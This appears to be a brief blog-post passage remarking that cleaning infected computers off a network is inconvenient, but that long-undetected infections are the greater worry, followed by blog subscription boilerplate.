Not being able to use your computer for a while, while system administrators are shutting them down, cleaning them and bringing them back into the network is very inconvenient. But it is even more worrysome that computers and networks have been infected for a much longer period without anyone noticing.


Follow

Get every new post delivered to your Inbox.

Join 36 other followers